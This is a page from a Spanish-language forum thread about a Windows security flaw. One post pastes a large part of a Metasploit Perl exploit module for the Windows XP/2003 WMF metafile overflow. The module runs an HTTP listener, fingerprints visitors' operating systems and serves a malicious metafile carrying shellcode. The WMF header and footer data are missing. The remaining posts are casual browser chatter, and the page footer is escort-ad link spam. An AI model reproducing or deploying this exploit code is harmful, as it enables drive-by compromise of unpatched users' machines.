Página 2 de 3 PrimerPrimer 123 ÚltimoÚltimo
Resultados 11 al 20 de 27

Tema: Falla de seguridad en Win

  1. #11

    Re: Falla de seguridad en Win

    voy a ver si lo pruebo en casa... porque nunca lo probe creo...

  2. #12

    Re: Falla de seguridad en Win

    Note : This unpatched vulnerability is currently being exploited in the wild
    # This file is part of the Metasploit Framework and may be redistributed
    # according to the licenses defined in the Authors field below. In the
    # case of an unknown or missing license, this file defaults to the same
    # license as the core Framework (dual GPLv2 and Artistic). The latest
    # version of the Framework can always be obtained from metasploit.com.
    package Msf::Exploit::ie_xp_pfv_metafile;
    use strict;
    use base "Msf::Exploit";
    use Pex::Text;
    use IO::Socket::INET;
    my $advanced =
    my $info =
    'Name' => 'Windows XP/2003 Picture and Fax Viewer Metafile Overflow',
    'Version' => '$Revision: 1.2 $',
    'Authors' =>
    'H D Moore <hdm [at] metasploit.com'
    'Description' =>
    This module exploits a vulnerability in the Windows Picture and 
    Fax Viewer found in Windows XP and 2003. This vulnerability uses
    a corrupt Windows Metafile to execute arbitrary code and was reported by
    noemailpls[at]noemail.ziper to the Bugtraq mailing list after
    being discovered in the wild at the following URL:
    'Arch' => [ 'x86' ],
    'OS' => [ 'win32', 'winxp', 'win2003' ],
    'Priv' => 0,
    'UserOpts' =>
    'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
    'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "" ],
    'Payload' =>
    'Space' => 5081,
    'Keys' => [ '-ws2ord', '-bind' ],
    'Refs' =>
    'DefaultTarget' => 0,
    'Targets' =>
    [ 'Automatic - Windows XP / Windows 2003' ]
    'Keys' => [ 'ie' ],
    'DisclosureDate' => 'Dec 27 2005',
    sub new
    my $class = shift;
    my $self;
    $self = $class->SUPER::new(
    'Info' => $info,
    'Advanced' => $advanced,
    return $self;
    sub Exploit
    my $self = shift;
    my $server = IO::Socket::INET->new(
    LocalHost => $self->GetVar('HTTPHOST'),
    LocalPort => $self->GetVar('HTTPPORT'),
    ReuseAddr => 1,
    Listen => 1,
    Proto => 'tcp');
    my $client;
    # Did the listener create fail?
    if (not defined($server))
    $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
    $self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . "/anything.wmf");
    while (defined($client = $server->accept()))
    $self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client));
    sub HandleHttpClient
    my $self = shift;
    my ($fd) = @{{@_}}{qw/fd/};
    my $targetIdx = $self->GetVar('TARGET');
    my $target = $self->Targets->[$targetIdx];
    my $ret = $target->[1];
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    my $content;
    my $rhost;
    my $rport;
    my $content;
    my $targets =
    "Windows XP" => [ ], # Automatic
    "Windows 2003" => [ ], # Automatic
    my $target;
    my $os;
    # Read the HTTP command
    my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
    # Read in the HTTP headers
    while (my $line = $fd->RecvLine(10))
    my ($var, $val) = split /: /, $line;
    # Break out if we reach the end of the headers
    last if (not defined($var) or not defined($val));
    if ($var eq 'User-Agent')
    $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/);
    $os = "Windows XP" if (!$os and $val =~ /Windows NT 5.1/);
    $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/);
    $os = "Windows NT" if (!$os and $val =~ /Windows NT/);
    $os = "Unknown" if (!$os);
    # Set the remote host information
    ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
    $target = $targets->{$os};
    if (! $target) {
    $self->PrintLine("[*] Unsupported HTTP Client connected from $rhost:$rport using $os");
    my $content = $self->wmf_head . $shellcode . $self->wmf_foot;
    $self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, sending payload...");
    # Transmit the HTTP response
    "HTTP/1.1 200 OK\r\n" .
    "Content-Type: text/plain\r\n" .
    "Content-Length: " . length($content) . "\r\n" .
    "Connection: close\r\n" .
    "\r\n" .
    # Ripped straight from wmf_exp.wmf
    sub wmf_head {
    # Ripped straight from wmf_exp.wmf
    sub wmf_foot {

  3. #13

    Re: Falla de seguridad en Win

    y eso?

  4. #14
    Lowy baja CP Avatar de Pyr0
    Fecha de Ingreso
    01 dic, 04
    Lomas de Zamora

    Re: Falla de seguridad en Win

    Cita Iniciado por emavs
    y eso?
    COCOA en estado puro.

  5. #15

    Re: Falla de seguridad en Win

    Holy threads resurrection batman !!

  6. #16
    ~ echo Avatar de Redempt
    Fecha de Ingreso
    26 dic, 05
    ¬¬ trola

    Re: Falla de seguridad en Win

    God save macs and Safari

    Omg...en la mac uso el inet la mayoría de las veces

    xD Siempre me olvido de sacar foto al cartelito de que un virus no se pudo instalar

  7. #17

    Re: Falla de seguridad en Win

    Cita Iniciado por bot server
    Opera es el mas rapido y mejor browser que existe.
    Mas rapido que el IE o FF no abre... quizas navega mas rapido pero cuando tenes pocos recursos rompe las bolas abrir al opera.
    Cita Iniciado por Desodorante Ver Mensaje
    Que el offi la chupe!!! Esto en blizlike!!!

  8. #18

    Re: Falla de seguridad en Win

    yo de esto ni me entere....

  9. #19
    Get Bent. Avatar de Skull007
    Fecha de Ingreso
    25 feb, 05

    Re: Falla de seguridad en Win

    Entonces ya me bajo el FireFox xd.-
    Gaming has changed. It's no longer about games, friends or having fun. It's an endless series of hassles, filled with updates and add-ons. Gaming, and its consumption of our money, has become a well-oiled machine. Gaming has changed. ID tagged consoles play ID tagged games, use ID tagged accessories. DLC inside their gamedata enhance and regulate their abilities. Game control. Multiplayer control. Handheld control. Console control. Everything is monitored, and kept under control. Gaming has changed. The age of fun has become the age of control. All in the name of making a profit from their loyal customers. And he who controls the gamers, controls history. Gaming has changed. When video games are under total control, gaming... becomes routine.

  10. #20
    Senior NoOb Membrer Avatar de panu
    Fecha de Ingreso
    06 jun, 05
    Palencia, España

    Re: Falla de seguridad en Win

    yo uso Maxthon o MyIE, es el IE pero con pestañas, anti popus y demases mejoras

Página 2 de 3 PrimerPrimer 123 ÚltimoÚltimo

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes

ESCORTS Capital Federal | ESCORTS Zona Sur | ESCORTS Zona Norte | ESCORTS Zona Oeste | ESCORTS Mar del Plata | ESCORTS La Plata | ESCORTS Cordoba | ESCORTS Rosario | ESCORTS Tucuman | Escorts Almagro | Escorts Belgrano | Escorts Caballito | Escorts Centro | Escorts Flores | Escorts Microcentro | Escorts Once | Escorts Palermo | Escorts Recoleta | Escorts Tribunales | Escorts Devoto | Escorts Villa Urquiza | Escorts Caba